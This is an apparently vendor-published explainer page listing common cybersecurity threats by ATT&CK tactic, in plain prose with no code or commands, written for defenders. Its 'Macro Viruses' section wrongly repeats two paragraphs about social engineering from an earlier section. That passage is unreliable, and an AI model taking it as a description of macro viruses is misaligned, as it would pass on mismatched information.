Skip to main content

Top 50 Cybersecurity Threats

The Splunk Threat Research Team (STRT) lists some of the biggest cybersecurity threats out there — grouped by the MITRE ATT&CK framework’s threat tactics — to help you stay ahead of hackers.

hero image
command and control

Command and control

Command and Control

What you need to know: A command and control attack is when a hacker takes over a computer in order to send commands or malware to other systems on the network. In some cases, the attacker performs reconnaissance activities, moving laterally across the network to gather sensitive data.

In other attacks, hackers may use this infrastructure to launch actual attacks. One of the most important functions of this infrastructure is to establish servers that will communicate with implants on compromised endpoints. These attacks are also often referred to as C2 or C&C attacks.

Most hackers get a foothold in a system by phishing emails then installing malware. This establishes a command and control channel that’s used to proxy data between the compromised endpoint and the attacker. These channels relay commands to the compromised endpoint and the output of those commands back to the attacker.

There have been prominent command and control attacks originating from Russia, Iran and even the U.S. These attackers can come from anywhere and everywhere — but they don’t want you to know that. 

Since communication is critical, hackers use techniques designed to hide the true nature of their correspondence. They’ll often try to log their activities for as long as possible without being detected, relying on a variety of techniques to communicate over these channels while maintaining a low profile.

iot threats

IoT Threats

What you need to know: There are an estimated 13.1 billion connected IoT devices globally — a number that is projected to increase to 30 billion by 2030. These devices often lack security infrastructure, creating glaring vulnerabilities in the network that exponentially grow the attack surface and leave it susceptible to malware. Attacks delivered over IoT devices can include DDoS, ransomware and social engineering threats.

Hackers and malicious nation-states can exploit vulnerabilities in connected IoT devices with sophisticated malware to gain access to a network so they can monitor users or steal intellectual property, classified or personally identifying data and other critical information. Once they infiltrate an IoT system, hackers can also use their newly gained access for lateral movement to other connected devices or to gain entry to a greater network for various malicious purposes

Attacks can come from anywhere in the world. But because many verticals such as government, manufacturing and healthcare are deploying IoT infrastructure without proper security protections, these systems are targets for attacks by hostile nation-states and sophisticated cybercrime organizations. Unlike attacks against technology infrastructure, attacks against connected civic or healthcare systems could lead to widespread disruption, panic and human endangerment.

iot threats


What you need to know: Ransomware is an attack where an infected host encrypts a victim’s data, holding it hostage until they pay the attacker a fee. Recent ransomware attacks have demonstrated that hackers have begun threatening to leak or sell the stolen data, increasing the potential damage of these kinds of attacks by orders of magnitude. 

There are countless types of ransomware, but certain groups are especially nefarious. One well-known gang, Blackmatter, has targeted a number of organizations critical to the U.S. economy and infrastructure, including the food and agriculture industry. Ryuk is another type of ransomware to watch out for. As of 2019, Ryuk had the highest ransom on record at $12.5 million.

Attackers can deploy ransomware to businesses and individuals through spear phishing campaigns and drive-by downloads, as well as through traditional remote service-based exploitation. Once the malware is installed on the victim’s machine, it either prompts the user with a pop-up or directs them to a website, where they’re informed that their files are encrypted and can be released if they pay the ransom.

Ransomware has typically been the work of advanced cybercriminal groups — who remain anonymous after extorting governments or major enterprises requires technological sophistication. However, since the arrival of cryptocurrencies, which simplify anonymous transactions, the general population is at greater risk of ransomware attack.


Credential access

Account Takeover

What you need to know: Rather than stealing the card or credentials outright, account takeover is more surreptitious, allowing the attacker to get as much use out of the stolen card as possible before being flagged for suspicious activity. Banks, major marketplaces and financial services like PayPal are common targets, and any website that requires a login is susceptible to this attack.

Some of the most common methods include proxy-based "checker" one-click apps, brute force botnet attacks, phishing and malware. Other methods include dumpster diving to find personal information in discarded mail, and outright buying lists of “Fullz,” a slang term for full packages of identifying information sold on the black market. Once the profile of the victim is purchased or built, an identity thief can use the information to defeat a knowledge-based authentication system.

An enormous volume of our transactions — financial and otherwise — take place online. For cybercriminals, acquiring account credentials and personal information (like social security numbers, home addresses, phone numbers, credit card numbers and other financial information) is a lucrative business, whether they choose to sell the acquired information or use it for their own gain. As such, these kinds of attacks can originate anywhere in the world.

brute force

Brute Force Attack 

What you need to know: A brute force attack aims to take personal information, specifically usernames and passwords, by using a trial-and-error approach. This is one of the simplest ways to gain access to an application, server or password-protected account, since the attacker is simply trying combinations of usernames and passwords until they eventually get in (if they ever do; a six-character password has billions of potential combinations).

The most basic brute force attack is a dictionary attack, where the attacker systematically works through a dictionary or wordlist — trying each and every entry until they get a hit. They’ll even augment words with symbols and numerals, or use special dictionaries with leaked and/or commonly used passwords. And if time or patience isn’t on their side, automated tools for operating dictionary attacks can make this task much faster and less cumbersome.

Thanks to the ease and simplicity of a brute force attack, hackers and cyber criminals with little-to-no technical experience can try to gain access to someone’s account. The people behind these campaigns either have enough time or computational power on their side to make it happen. 


Compromised Credentials

What you need to know: Most people still use single-factor authentication to identify themselves (a pretty big no-no in the cybersecurity space). And while stricter password requirements are starting to be enforced (like character length, a combination of symbols and numbers, and renewal intervals), end users still repeat credentials across accounts, platforms and applications, failing to update them periodically. 

This type of approach makes it easier for adversaries to access a user’s account, and a number of today’s breaches are thanks to these credential harvesting campaigns.

A password, key or other identifier that’s been discovered can be used by a threat actor to gain unauthorized access to information and resources, and can range from a single account to an entire database.


By leveraging a trusted account within a targeted organization, a threat actor can operate undetected and exfiltrate sensitive data sets without raising any red flags. Common methods for harvesting credentials include the use of password sniffers, phishing campaigns or malware attacks.

Compromised credentials represent a huge attack vector, giving threat actors a way into computing devices, password-protected accounts and an organization’s network infrastructure with relative ease. These perpetrators are often organized, with their sights set on a specific organization or person. And they’re not always outside of the organization — they could very well be an insider threat who has some level of legitimate access to the company’s systems and data. 


Credential Dumping

What you need to know: Credential dumping simply refers to an attack that relies on gathering credentials from a targeted system. Even though the credentials may not be in plain text — they’re often hashed or encrypted — an attacker can still extract the data and crack it offline on their own systems. This is why the attack is referred to as "dumping.”. 

Often, hackers will try to steal passwords from systems they have already compromised. The problem becomes amplified when users replicate the same password across multiple accounts through multiple systems. 

Credentials obtained this way usually include those of privileged users, which may provide access to more sensitive information and system operations. Hackers often target a variety of sources to extract the credentials, including accounts like the security accounts manager (SAM), local security authority (LSA), NTDS from domain controllers or the group policy preference (GPP) files.


Once attackers obtain valid credentials, they use them to move throughout a target network with ease, discovering new systems and identifying assets of interest.

Credential dumping can originate from anywhere. And because we’re all guilty of recycling passwords, that information can be sold for future attacks.


Credential Reuse Attack

What you need to know: Credential reuse is a pervasive issue across any company or userbase. Nowadays, most users have tens (if not hundreds) of accounts, and are tasked with remembering countless passwords that meet all sorts of stringent requirements. As a result, they’ll resort to reusing the same password over and over again, in the hopes of better managing and remembering their credentials across accounts. Unsurprisingly, this can cause major security issues when said credentials are compromised.

In theory, the attack itself is simple, straightforward and surprisingly stealthy (if two-factor authentication isn’t activated). Once a user’s credentials are stolen, the culprit can try the same username and password on other consumer or banking websites until they get a match — hence the “reuse” in “credential reuse attack.”


However, gaining entry in the first place is a little more complicated. To get privileged information, attackers usually kick things off with a phishing attempt, using emails and websites that look close-to-legitimate to dupe the user into handing over their credentials.

This could be a targeted attack, where the person knows the victim and wants access to their accounts for personal, professional or financial reasons. The attack could also originate from a complete stranger who bought the user’s personal information on the cybercrime underground.

credential stuffing

Credential Stuffing

What you need to know: With credential stuffing, cybercriminals will use stolen account credentials — often usernames and passwords procured from a data breach — to access additional accounts by automating thousands or millions of login requests directed against a web application. They want to access sensitive accounts the easy way — by simply logging in. It works because they rely on people reusing the same usernames and passwords across multiple services. If they’re successful, one credential can unlock accounts that house financial and proprietary information, giving them the keys to almost everything. 

Hackers only need access to login credentials, an automated tool and proxies to carry out a credential stuffing attack. Attackers will take a cache of usernames and passwords, gleaned from massive corporate breaches, and by using automated tools, essentially “stuff” those credentials into the logins of other sites.

Proxies mask the location of credential stuffing attackers, making it challenging to detect their location. But they can be found all over the world, especially in organized cybercrime hotspots. Often, attackers will be individual and organized hackers with access to dedicated account-checking tools and numerous proxies that prevent their IP addresses from being blocked. Less-sophisticated perpetrators may end up giving themselves away by attempting to infiltrate a large number of accounts via bots, which results in an unexpected denial-of-service-attack (DDoS) scenario.


Data From Information Repositories

What you need to know: Information repositories are tools that allow for the storage of information — tools like Microsoft SharePoint and Atlassian Confluence. Information repositories typically facilitate collaboration or information sharing between users and they store a wide variety of data that may tempt attackers. Hackers may leverage information repositories to access and mine valuable information.

Information repositories often have a large user base, and detecting breaches can be difficult. Attackers may collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications.

Attackers like APT28 target government agencies, hotel booking websites, telecoms and IT companies. At a minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, enterprise or schema administrators) should be closely monitored and alerted upon, because these types of accounts should not generally be used to access information repositories. Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.


Network Sniffing

What you need to know: Network sniffing, also known as packet sniffing, is the real-time capturing, monitoring and analysis of data flowing within a network. Whether it’s via hardware, software or a combination of both, bad actors use sniffing tools to eavesdrop on unencrypted data from network packets, such as credentials, emails, passwords, messages and other sensitive information. 

Much like wiretapping scenarios in which someone listens in on phone calls for sensitive details, network sniffing works in the background, silently listening in as information is exchanged between entities on a network. This happens when attackers place a sniffer on a network via the installation of software or hardware plugged into a device that allows it to intercept and log traffic over the wired or wireless network the host device has access to. Due to the complexity inherent in most networks, sniffers can sit on the network for a long time before being detected.

Network sniffing is often conducted legally by organizations like ISPs, advertising agencies, government agencies and others who need to verify network traffic.


But it can also be launched by hackers doing it for the “lulz” or nation-states looking to pilfer intellectual property. Like ransomware, network sniffers can be injected into the network by getting the right person to click on the right link. Insider threats with access to sensitive hardware could also be a vector for attack.


Privileged User Compromise

What you need to know: It’s widely accepted that many serious data breaches can be traced back to the abuse of privileged credentials. These are accounts with elevated privileges, such as users with domain administrator rights or root privileges. Attackers are increasingly using privileged user credentials to access an organization’s resources and information and exfiltrate sensitive data. An attacker that gains access to privileged user credentials can take control of an organization's infrastructure to modify security settings, exfiltrate data, create user accounts and more, all the while appearing legitimate — and therefore harder to detect.

Attackers attempt to gain access to privileged accounts by using social engineering techniques, sending spear-phishing messages, using malware, or "pass the hash" attacks. Organizations have opened their networks to cope with an increasingly mobile, remote workforce, and enable a complex web of remote access used by suppliers and service providers. Many of those connections, including to the cloud, are accessed through powerful privileged account credentials, and finding, controlling and monitoring access to them all is challenging, giving bad actors plenty of openings.


Once armed with the credentials, attackers get in and grab what they can, such as SSH keys, certificates and domain administration hashes. And it takes only one successful account hit to cause a major data breach that can bring an organization to its knees.

Because it provides attackers with hard to detect, wide access to all kinds of data privilege, user compromise is widely appealing and commonly used in cyber attacks of various kinds, whether nation-state cyber espionage motivated by political ideology or sophisticated, financially-motivated cybercrime groups like Lapsus$.



What you need to know: Spyware is a type of malware that aims to gather personal or organizational data, track or sell a victim’s web activity (e.g., searches, history and downloads), capture bank account information and even steal a target’s identity. Multiple types of spyware exist, and each one employs a unique tactic to track the victim. Ultimately, spyware can take over a device, exfiltrating data or sending personal information to another unknown entity without prior knowledge or consent.

Spyware can install itself on a victim’s device through various means, but will commonly get a foothold in a system by duping the target or exploiting existing vulnerabilities. This can happen when a user carelessly accepts a random prompt or pop-up, downloads software or upgrades from an unreliable source, opens email attachments from unknown senders, or pirates movies and music.

Thanks to crimeware kits that are now readily available, this type of attack can come from anyone and anywhere. But more often than not, they’ll originate from nefarious organizations looking to sell a victim’s information to a third-party.


Web Session Cookie Theft

What you need to know: When an attacker successfully steals a session cookie, they can perform any actions the original user is authorized to take. A danger for organizations is that cookies can be used to identify authenticated users in single sign-on systems, potentially giving the attacker access to all of the web applications the victim can use, like financial systems, customer records or line-of-business systems potentially containing confidential intellectual property.

After a user accesses a service and validates their identity, a cookie is stored on their machine for an extended period of time so that they don’t have to log in over and over. Malicious actors can steal web session cookies through malware, then import the cookie into a browser they control, allowing them to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email or perform actions that the victim’s account has permissions to perform.

Cookie theft is commonly accomplished through malware that copies the victim’s cookies and sends them directly to the attacker. The malware can land on the victim’s machine in any number of ways covered in this book, like phishing, macro viruses, cross-site scripting and more. Many hackers engaging in cookie theft belong to larger networks based in Russia and China. The actors behind the YouTube attack, for example, were found to have been part of a group of hackers connected via a Russian-speaking forum.



Business Invoice Fraud

What you need to know: Business invoice fraud attempts to trick victims into paying out on a fraudulent (but convincing) bill addressed to your organization. In reality, the funds go to imposters mimicking suppliers. These hackers will often bill a reasonable amount so they don’t draw suspicion. But executing these scams hundreds or thousands of times quickly adds up.

In this attack, victims are sent fake invoices attempting to steal money in the hopes that marks aren’t paying attention to their accounts payable processes. Hackers will pick targets based on the size of their business, location and the suppliers used and create phony invoices that appear legitimate. With the hopes that the victim’s accounts payable department is backlogged, they send false invoices with high demands like “90 days past due, pay now!”

While there are numerous individual scammers pulling off business invoice fraud, many are sourced to fraud rings that have the organization and the resources to research their victim’s banking institution and create a billing experience that feels real. Fraud rings conducting invoice scams can be found all over the world.


Cloud Cryptomining 

What you need to know: Cryptomining is an intentionally difficult, resource-intensive business. Its complexity was designed to ensure that the number of blocks mined each day would remain steady. So it's par for the course that ambitious, yet unscrupulous, miners make amassing the computing power of large enterprises — a practice known as cryptojacking — a top priority. 

Cryptomining has attracted an increasing amount of media attention since its explosion in popularity in the fall of 2017. The attacks have moved from in-browser exploits and mobile phones to enterprise cloud services, such as Amazon Web Services, Google Cloud Platform (GCP) and Microsoft Azure. 

It's difficult to determine exactly how widespread the practice has become, since hackers continually evolve their ability to evade detection, including employing unlisted endpoints, moderating their CPU usage and hiding the mining pool's IP address behind a free content delivery network (CDN). 

When miners steal a cloud instance, often spinning up hundreds of new instances, the costs can become astronomical for the account holder. So it’s critical to monitor systems for suspicious activities that could indicate that a network has been infiltrated.

Because cryptocurrency is a global commodity, the attacks can originate from anywhere. Instead of focusing on where the attacks come from, it’s key to monitor cloud computing instances for activities related to cryptojacking and cryptomining, such as new cloud instances that originate from previously unseen regions, users who launch an abnormally high numbers of instances, or compute instances started by previously unseen users.

cross site scripting

Cross-Site Scripting

What you need to know: XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application generates input from a user without validating or encoding it. 

The end user’s browser has no way to know that the script should not be trusted, automatically executing on the script. Because it thinks the script came from a trusted source, it can access cookies, session tokens or other sensitive information retained by the browser. These scripts can even rewrite the content of the HTML page.

There are two types of XSS attacks: stored and reflected. Stored XSS attacks occur when an injected script is stored on the server in a fixed location, like a forum post or comment. Every user that lands on the infected page will be affected by the XSS attack. In reflected XSS, the injected script is served to a user as a response to a request, like a search results page.

While XSS attacks are not as common as they once were — due primarily to improvements in browsers and security technology — they’re still prevalent enough to rank within the top ten threats listed by the Open Web Application Security Project, and the Common Vulnerabilities and Exposures database lists nearly 14,000 vulnerabilities associated with XSS attacks.


Cryptojacking Attack

What you need to know: Cryptojacking is an attack where a hacker targets and hijacks computer systems with malware that hides on a device and then exploits its processing power to mine for cryptocurrency — such as Bitcoin or Ethereum — all at the victim’s expense. The hacker’s mission is to create valuable cryptocurrency with someone else’s computing resources

One common way cryptojacking attacks happen is by sending a malicious link in a phishing email, enticing users to download cryptomining code directly onto their computer. Another way is by embedding a piece of JavaScript code into a webpage that the user visits — known as a drive-by attack. Upon visiting the page, malicious code intended to mine cryptocurrency will automatically download on the machine. The cryptomining code then works silently in the background without the user’s knowledge — and a slower than usual computer might be the only indication that something is wrong.

These attacks come from all over the world because cryptojacking doesn’t require significant technical skills. Cryptojacking kits are available on the deep web for as little as $30. It’s a low bar of entry for hackers that want to make a quick buck for relatively little risk. In one attack, a European bank experienced some unusual traffic patterns on its servers, slower than average night processes, and unexplained online servers — all attributed to a rogue staffer who installed a cryptomining system.

ddos attack

DDoS Attack

What you need to know: A DDoS attack is an attempt by hackers, hacktivists or cyber spies to take down websites, slow down and crash the target servers and make online service unavailable by flooding them with traffic from multiple sources. As their name suggests, DDoS attacks are widely distributed brute-force attempts to wreak havoc and cause destruction. These attacks often tend to target popular or high-profile sites, such as banks, news and government websites, to thwart or deter target organizations from publishing important information or to weaken them financially.

The malicious actors behind DDoS attacks aim to wreak havoc on their targets, sabotage web properties, damage brand reputation and prompt financial losses by preventing users from accessing a website or network resource. DDoS leverages hundreds or thousands of infected "bot" computers located all over the world. Known as botnets, these armies of compromised computers will execute the attack at the same time for full effectiveness.

The hacker or group of hackers that control these infected computers then become botmasters, who infect vulnerable systems with malware, often Trojan viruses. When enough devices are infected, the botmaster gives them the command to attack and the target servers and networks are bombarded with requests for service, which in turn effectively chokes them and shuts them down.

As their name implies, DDoS attacks are distributed, meaning that the incoming flood of traffic targeting the victim’s network originates from numerous sources. Thus, the hackers behind these attacks can literally be from anywhere in the world. What’s more, their distributed nature makes it impossible to stop these attacks simply by securing or blocking a single source.

iomt threat

IoMT Threats

What you need to know: The Internet of Medical Things (IoMT) has transformed healthcare as we know it, especially in the era of COVID-19. Leveraging IoMT has the power to unleash countless opportunities in diagnosing, treating and managing a patient’s health and wellness, and holds the key to lowering cost while improving quality of care. But as the number of connected devices invariably grows, so does the cybersecurity risk. As of 2020, more than 25% of cyberattacks in healthcare delivery organizations involve IoMT.

Because digital technologies age faster than their physical counterparts — which typically have a long product life cycle — outdated equipment and software are creating serious cybersecurity vulnerabilities for both hospitals and patients. Currently, manufacturers don’t allow customers to troubleshoot and patch their own devices, and will even go so far as to void warranties if they do. Compounded with lack of encryption, hardcoded credentials and lax security controls, there’s little that healthcare organizations can do to mitigate risk where legacy devices are involved.

IoMT attackers have the ability and resources to pinpoint healthcare providers with ambiguous security ownership, as well as poor asset or inventory visibility, and out-of-date systems and devices.


Malicious Powershell 

What you need to know: PowerShell is a command-line and scripting tool developed by Microsoft and built on .NET (pronounced "dot net"), that allows administrators and users to change system settings as well as to automate tasks. The command-line interface (CLI) offers a range of tools and flexibility, making it a popular shell and scripting language. Bad actors have also recognized the perks of PowerShell — namely, how to operate undetected on a system as a code endpoint, performing actions behind the scenes.

Since PowerShell is a scripting language that runs on the majority of enterprise machines — and since most companies don’t monitor code endpoints — the logic behind this type of attack is abundantly clear. It’s easy to gain access, and even easier for attackers to take root in the system. Malware doesn’t need to be installed in order to run or execute the malicious script. This means the hacker can effortlessly bypass detection — circumventing the analysis of executable files to wreak havoc at their leisure.

This type of attack is more sophisticated than other methods, and is usually executed by a power hacker who knows exactly what they’re doing (versus an amateur who might resort to brute force attacks). Ever stealth in their approach, they’re adept at covering their tracks, and know how to move laterally across a network.


Man-in-the-Middle Attack

What you need to know: The MITM attack, also known as adversary-in-the-middle (AiTM), sets up a proxy server that intercepts the victim’s log-in session, so that the malicious actor can act as a relay between the two parties or systems — thereby gaining access to and/or pilfering sensitive information. This type of attack allows a malicious actor to intercept, send and receive data intended for somebody else — or that’s not meant to be sent at all — without either outside party knowing, until it is too late.

Virtually anyone could execute a man-in-the-middle attack. Since the implementation of HTTPS Everywhere, however, these kinds of attacks are more difficult to execute, and are therefore more rare. In an MITM attack, the hacker sits between the user and the real website (or other user) and passes the data between them, exfiltrating whatever data they like from the interaction.

Because improvements in security technologies have made MITM attacks more difficult to execute, the only groups attempting them are sophisticated hackers or state actors. In 2018, the Dutch police found four members of the Russian hacking group Fancy Bear parked outside of the Organization for the Prohibition of Chemical Weapons in Holland, attempting an MITM infiltration to steal employee credentials. Later that year, the U.S. and UK governments released warnings that Russian state-sponsored actors were actively targeting routers in homes and enterprises for the purpose of MITM exfiltration.

system misconfiguration

System Misconfiguration

What you need to know: Security misconfiguration is a widespread problem that can put organizations at risk thanks to incorrectly configured security controls (or lack thereof). This can happen at almost any level of the IT and security stack, ranging from the company’s wireless network, to web and server applications, to custom code.

This type of attack usually happens because of missing patches, use of default accounts, unnecessary services, insecure default configuration and poor documentation. This could be attributed to everything from a failure to set a security header on a web server, to forgetting to disable administrative access for certain levels of employees. This attack can also happen when hackers take root in legacy applications with inherent misconfigurations due to a lack of updates.

Misconfiguration isn't considered a malicious act in and of itself, but instead is mostly due to being a result of human error. However, attackers may know where to look if they suspect a lax level of configuration across a certain organization’s IT stack.


Watering Hole Attack

What you need to know: Like a literal watering hole, a watering hole attack is one in which the user’s computer is compromised by visiting an infected website with malware designed to infiltrate their network and steal data or financial assets. The specific technique is essentially a zero-day attack — the goal being to infect the computer system with to gain access to a network for financial gain or proprietary information.

The attackers will first profile their target to determine the websites they frequently visit, and from there, will look for vulnerabilities. By exploiting identified flaws, the attacker compromises these websites and then waits, knowing it’s only a matter of time before the user in question visits. The compromised website will, in turn, infect their network, allowing attackers to gain entry into their entire system and then move laterally to other systems.

While they come from all over, many of the cybercriminals behind this attack originate where organized threat groups flourish, such as Russia, Eastern Europe and China. In 2018, a country-level watering hole attack was sourced to the Chinese threat group known as LuckyMouse” (aka Iron Tiger, ‘EmissaryPanda,” “APT 27” and “Threat Group 3390”), known for targeting government, energy and manufacturing sectors with numerous types of attacks, including watering hole assaults.


Zero-Day Exploit

What you need to know: A zero-day vulnerability, at its core, is a flaw. It is a weakness within a piece of software or a computer network that hackers take advantage of soon (or immediately) after it becomes available for general use — the term “zero” refers to the same-day window in which these vulnerabilities are abused.

A zero-day attack happens once the vulnerability is exploited. The nature of the vulnerability will affect how the attack is implemented, but zero-day attacks follow a pattern. First, the hacker (or groups of hackers working together) scan the code base for vulnerabilities. Once they find the flaw, they create code that exploits the vulnerability. They infiltrate the system (using one or more of the methods described in this book) and infect it with their malicious code, then launch the exploit.

The prevalence of technology has led to explosive growth in zero-day attacks. While these attacks can ostensibly be launched from anywhere, they often are proliferated via nation-states or regions with extensive cyber underworld networks and infrastructure. Recent reports have cited that the bulk of zero day threats in 2021 were sourced to hacking groups in China. 


Initial access

Drive-by Download Attack

What you need to know: A drive-by download refers to the unintentional download of malicious code onto a computer or mobile device that exposes users to different types of threats. Cybercriminals use drive-by downloads to steal and collect personal information, inject banking Trojans or introduce exploit kits or other malware to user devices. To be protected against drive-by downloads, regularly update or patch systems with the latest versions of apps, software, browsers and operating systems. It’s also recommended to stay away from insecure or potentially malicious websites.

What makes drive-by downloads different is that users do not need to click on anything to initiate the download. Simply accessing or browsing a website can activate the download. The malicious code is designed to download malicious files onto the victim’s device without the user’s knowledge. A drive-by download abuses insecure, vulnerable or outdated apps, browsers or even operating systems.

The rise of prepackaged drive-by download kits allows hackers of any skill level to launch these kinds of attacks. In fact, these kits can be purchased and deployed without the hacker writing their own code or establishing their own infrastructure for data exfiltration or other abuses. The ease with which these attacks can be executed means that they can come from virtually anywhere.



What you need to know: A phishing attack tricks everyday consumers, users or employees into clicking on a malicious link, often driving them to a bogus site to provide personally identifiable information such as banking account numbers, credit card information or passwords, delivered via email, direct message or other communication. Be wary — while these bogus sites may look convincing, attackers will harvest any information you submit to them. Or they may launch malware aimed at stealing funds from your accounts, personally identifiable customer information or other critical assets.  

Typically you’ll be lured by an email impersonating someone you know — a message that appears to be from a manager or coworker, for example — compelling you to open malicious attachments or click links that lead you to webpages practically identical to legitimate sites.

Just a few decades ago, a large number of phishing attacks were sourced to Nigeria in what were known as 419 scams, due to their fraud designation in the Nigerian criminal code. Today, phishing attacks originate from all over the world, with many occurring in BRIC countries (Brazil, Russia, India and China), according to the InfoSec Institute. Because of the ease and availability of phishing toolkits, even hackers with minimal technical skills can launch phishing campaigns. The people behind these campaigns run the gamut from individual hackers to organized cybercriminals.


Social Engineering Attack

What you need to know: Social engineering is the term used for a broad range of malicious activities accomplished through psychological manipulation to trick users into making security mistakes or giving away sensitive information. What makes social engineering especially dangerous is that it relies on human error, rather than vulnerabilities in software and operating systems. Mistakes made by legitimate users are much less predictable, making them harder to identify and thwart than a malware-based intrusion.

Social engineering attacks come in many different forms and can be performed anywhere where human interaction is involved. The following are five common forms of digital social engineering assaults. A perpetrator first investigates the intended victim to gather the necessary background information — such as potential points of entry and weak security protocols — needed to proceed with the attack. Then, the attacker gains the victim’s trust and provides stimuli for subsequent actions that break security practices, such as revealing sensitive information or granting access to critical resources.

Social engineering can take many forms and come from many sources and motivations. Most commonly, it comes in the form of phishing emails. Other forms include pretexting, where the attacker creates a good pretext to steal important data; baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for providing login credentials; and tailgating or piggybacking, in which an attacker gains access to a restricted area of a business by following an authenticated employee through secure doors.


SQL Injection

What you need to know: SQL injection is a type of injection attack used to manipulate or destroy databases using malicious SQL statements. SQL statements control the database of your web application and can be used to bypass security measures if user inputs are not properly sanitized.

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data, execute administration operations on the database, recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.

Because so much of the internet is built on relational databases, SQL injection attacks are exceedingly common. Searching the Common Vulnerabilities and Exposures database for “injection” returns 15,000 results.


Supply Chain Attack

What you need to know: A supply chain attack is a powerful cyberattack that can breach even the most sophisticated security defenses through legitimate third-party vendors. Because vendors need access to sensitive data in order to integrate with their customers’ internal systems, when they are compromised in a cyberattack, often their customers’ data is too. And because vendors store sensitive data for numerous customers, a single supply chain attack gives hackers access to the sensitive data of many organizations, across many industries. The severity of supply chain attacks cannot be overstated. And the recent spate of these attacks suggests this method is now the state actors’ attack du jour.

A supply chain attack uses legitimate, trusted processes to gain full access to organizations’ data by targeting the vendor’s software source code, updates or build processes. They are difficult to detect because they happen at an offset to the attack surface. Compromised vendors then unwittingly transmit malware to their customer network. Victims can be breached through third-party software updates, application installers and through malware on connected devices. One software update can infect thousands of organizations, with minimal effort from the hacker, who now has “legitimate” access to move laterally across thousands of organizations.

Supply chain attacks are large-scale, sophisticated attacks perpetrated by sophisticated threat actors, often nation-state sponsored and ideologically motivated, though financial gain is also a big motivation. 


Lateral movement

Application Access Token

What you need to know: With an OAuth access token, a hacker can use the user-granted REST API to perform functions such as email searching and contact enumeration. With a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.

Attackers may use application access tokens to bypass the typical authentication process and access restricted accounts, information or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Compromised access tokens may be used as an initial step to compromising other services. For example, if a token grants access to a victim’s primary email, the attacker may be able to extend access to all other services that the target subscribes to by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to countermeasures like changing passwords.


Cloud Access Management 

What you need to know: Managing permissions for your organization has become increasingly important in order to avoid a cloud-based breach. Lax or nonexistent security — and in this case, incorrectly configured security controls — can easily jeopardize the security of your data, exposing your organization to an unnecessary amount of risk, including significant damage to brand reputation.

This attack usually happens because of poor communication, lack of protocol, insecure default configuration and poor documentation. Once the attacker exploits the vulnerability and gains a foothold in your cloud environment, they can leverage privileges to access other remote entry points, looking for insecure applications and databases, or weak network controls. They can then exfiltrate data while remaining undetected.

Mismanagement and misconfiguration of a cloud environment isn't considered a malicious act in and of itself, and as mentioned, typically occurs due to human error.


Macro Viruses

What you need to know: A macro virus is a computer virus written in the same macro language that is used for software applications. Some applications, like Microsoft Office, Excel and PowerPoint allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in emails, or emails from unrecognized senders. Many antivirus programs can detect macro viruses, however the macro virus' behavior can still be difficult to detect.

Social engineering attacks come in many different forms and can be performed anywhere where human interaction is involved. The following are five common forms of digital social engineering assaults. A perpetrator first investigates the intended victim to gather the necessary background information — such as potential points of entry and weak security protocols — needed to proceed with the attack. Then, the attacker gains the victim’s trust and provides stimuli for subsequent actions that break security practices, such as revealing sensitive information or granting access to critical resources.

Social engineering can take many forms and come from many sources and motivations. Most commonly, it comes in the form of phishing emails. Other forms include pretexting, where the attacker creates a good pretext to steal important data; baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for providing login credentials; and tailgating or piggybacking, in which an attacker gains access to a restricted area of a business by following an authenticated employee through secure doors.


Pass the Hash

What you need to know: Pass the hash allows an attacker to authenticate a user's password with the underlying NTLM or LanMan hash instead of the associated plaintext password. Once the hacker has a valid username along with their password’s hash values, they can get into the user’s account without issue, and perform actions on local or remote systems. Essentially, hashes replace the original passwords that they were generated from.

On systems using NTLM authentication, a user’s password or passphrase is never submitted in cleartext. Instead, it’s sent as a hash in response to a challenge-response authentication scheme. When this happens, valid password hashes for the account being used are captured using a credential access technique.

This type of attack is more sophisticated than other methods, and is usually executed by highly organized, motivated threat groups with their sights set on a specific organization or person, and with a mind to political or financial gain.


Suspicious Cloud Authentication Activities

What you need to know: Organizations need to move away from network security in order to better protect and authenticate user identities. Up until recently, however, this was much easier said than done. Certain technologies simply lacked the necessary integration capabilities, limiting an organization’s ability to centrally monitor the overall security of their resources.

Now there are countless technologies available that revolve around access control, like multifactor authentication (MFA). To avoid illegitimate authentication on cloud applications, no user or device — whether internal or external to the organization — should be implicitly trusted, and access to all resources should be explicitly and continuously authenticated and authorized.

The threat or attacker can easily penetrate the network/breach the perimeter when there’s a distinct lack of or a weak IAM framework, and when an organization is still relying on network/endpoint security. In both instances, because the identity access controls are so lax, the attacker can easily log in with the stolen credentials without being detected, and then move laterally across the network, as well as any connected systems, compromising assets and causing irrevocable damage — ultimately giving them free reign.

Between the growing number of phishing attacks, increasing number of user identities and the continued growth of cloud adoption, this type of attack can come from anywhere, including third-party vendors, employees, remote workers and contractors.


Suspicious Zoom Child Processes

What you need to know: Essentially, these local privilege escalation flaws take advantage of Zoom’s software architecture designs. These exploits can be launched by a local attacker, in which the adversary is someone who already has physical control of a vulnerable computer. Once the bugs are exploited, attackers can gain and sustain persistent access to various functions of a victim’s computer, which allows them to install ransomware, Trojans, spyware and numerous other types of malicious code into targeted systems for nefarious purposes.

One way this attack can happen is through the Zoom installer designed to install the Zoom MacOS app without any user interaction. In this scenario, a local adversary with low-level user privileges can inject the Zoom installer with malware to obtain highest, root-level privileges that allow them to access the underlying Mac operating system, making it easier to run malware or spyware without the consent or knowledge of the user. 


Another bug exploits a flaw in Zoom's local library validation function. An attacker can load a malicious third-party library into Zoom’s process/address space, which automatically inherits all Zooms access rights, and gain control over camera and microphone permissions without the user’s knowledge or consent.

